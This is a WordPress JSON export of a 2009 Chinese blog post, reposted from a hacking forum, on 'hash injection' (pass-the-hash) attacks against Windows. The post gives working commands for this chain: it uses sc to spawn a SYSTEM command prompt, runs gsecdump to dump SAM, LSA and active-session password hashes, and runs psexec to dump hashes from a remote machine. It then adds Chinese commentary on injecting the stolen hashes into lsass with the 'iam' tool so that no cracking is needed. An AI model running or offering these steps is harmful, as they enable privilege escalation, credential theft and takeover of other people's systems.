{"id":106,"date":"2009-07-10T19:15:11","date_gmt":"2009-07-10T19:15:11","guid":{"rendered":""},"modified":"2011-11-18T16:59:49","modified_gmt":"2011-11-18T08:59:49","slug":"106","status":"publish","type":"post","link":"http:\/\/zerobox.org\/notes\/106.html","title":{"rendered":"HASH\u6ce8\u5165\u5f0f\u653b\u51fb"},"content":{"rendered":"<p><span style=\"font-size: x-small;\">\u672c\u6587\u88c5\u8f7d\u4e8e\uff1a<a href=\"http:\/\/forum.eviloctal.com\/thread-34966-1-2.html\">http:\/\/forum.eviloctal.com\/thread-34966-1-2.html<\/a><\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: x-small;\">To get a DOS Prompt as NT system: <\/span><\/p>\n<p>C:&gt;sc create shellcmdline binpath= &#8220;C:WINDOWSsystem32cmd.exe \/K start&#8221; type= own type= interact<br \/>\n[SC] CreateService SUCCESS<\/p>\n<p>C:&gt;sc start shellcmdline<br \/>\n[SC] StartService FAILED 1053:<\/p>\n<p>The service did not respond to the start or control request in a timely fashion.<\/p>\n<p>C:&gt;sc delete shellcmdline<br \/>\n[SC] DeleteService SUCCESS<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;<\/p>\n<p>Then in the new DOS window:<\/p>\n<p><span class=\"t_tag\" onclick=\"tagshow(event)\">Microsoft<\/span> Windows XP [Version 5.1.2600]<br \/>\n(C) Copyright 1985-2001 Microsoft Corp.<\/p>\n<p>C:WINDOWSsystem32&gt;whoami<br \/>\nNT AUTHORITYSYSTEM<\/p>\n<p>C:WINDOWSsystem32&gt;gsecdump -h<br \/>\ngsecdump v0.6 by Johannes Gumbel (<a href=\"mailto:johannes.gumbel@truesec.se\"><span style=\"font-size: x-small;\">johannes.gumbel@truesec.se<\/span><\/a><span style=\"font-size: x-small;\">)<br \/>\nusage: gsecdump [options] <\/span><\/p>\n<p>options:<br \/>\n-h [ &#8211;help ] show help<br \/>\n-a [ &#8211;dump_all ] dump all secrets<br \/>\n-l [ &#8211;dump_lsa ] dump lsa secrets<br \/>\n-w [ &#8211;dump_wireless ] dump microsoft wireless connections<br \/>\n-u [ &#8211;dump_usedhashes ] dump hashes from active logon sessions<br \/>\n-s [ &#8211;dump_hashes ] dump hashes from SAM\/AD<\/p>\n<p>Although I like to use:<\/p>\n<p>PsExec v1.83 &#8211; Execute processes remotely<br \/>\nCopyright (C) 2001-2007 Mark Russinovich<br \/>\nSysinternals &#8211; <a href=\"http:\/\/www.sysinternals.com\/\" target=\"_blank\"><span style=\"font-size: x-small;\">www.sysinternals.com<\/span><\/a><\/p>\n<p>C:&gt;psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u &gt;Active-HASH.TXT<\/p>\n<p>to get the hashes from active logon sessions of a remote system.<\/p>\n<p>These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.<\/p>\n<p>\u63d0\u793a\u4e00\u4e0b,\u53ef\u4ee5\u4f7f\u7528pshtools\u5de5\u5177\u5305\u4e2d\u7684iam,\u628a\u521a\u624d\u4f7f\u7528gsecdump\u6293\u53d6\u51fa\u6765HASH\u4fe1\u606f\u5bfc\u5165\u672c\u5730\u7684lsass\u8fdb\u7a0b,\u6765\u5b9e\u73b0hash\u6ce8\u5165\u5f0f\u653b\u51fb,\u8fd8\u662f\u8001\u5916\u5389\u5bb3,\u8fd9\u4e0b\u7ba1\u7406\u5458\u6709\u5f97\u5fd9\u4e86,ARP\u6b3a\u9a97\u7684\u65f6\u5019\u83b7\u5f97\u7684LM\/NThash,\u8fd8\u6709gethash\u83b7\u5f97\u7684,\u5176\u5b9e\u6839\u672c\u4e0d\u7528\u7834\u89e3\u5bc6\u7801,\u8fd9\u4e2a\u5c31\u662f\u5229\u7528\u5de5\u5177\u4e86,\u539f\u6587\u8bf4\u7684\u597d,\u4e0d\u7ba1\u5bc6\u7801\u662f\u8bbe\u7f6e4\u4f4d\u8fd8\u662f127\u4f4d,\u53ea\u8981\u6709\u4e86hash,100%\u5c31\u80fd\u641e\u5b9a\u4e86.<br \/>\n\u539f\u6587\u51fa\u5904:<a href=\"http:\/\/truesecurity.se\/blogs\/murray\/archive\/2007\/03\/16\/why-an-exposed-lm-ntlm-hash-is-comparable-to-a-clear-text-password.aspx\" target=\"_blank\"><span style=\"font-size: x-small;\">http:\/\/truesecurity.se\/blogs\/mur &#8230; -text-password.aspx<\/span><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u672c\u6587\u88c5\u8f7d\u4e8e\uff1ahttp:\/\/forum.eviloctal.com\/thread- &hellip;<\/p>\n<p class=\"read-more\"><a href=\"http:\/\/zerobox.org\/notes\/106.html\">\u7ee7\u7eed\u9605\u8bfb &raquo;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[120,94],"class_list":["post-106","post","type-post","status-publish","format-standard","hentry","tag-hash","tag-94"],"views":846,"_links":{"self":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/106","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/comments?post=106"}],"version-history":[{"count":0,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/106\/revisions"}],"wp:attachment":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/media?parent=106"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/categories?post=106"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/tags?post=106"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}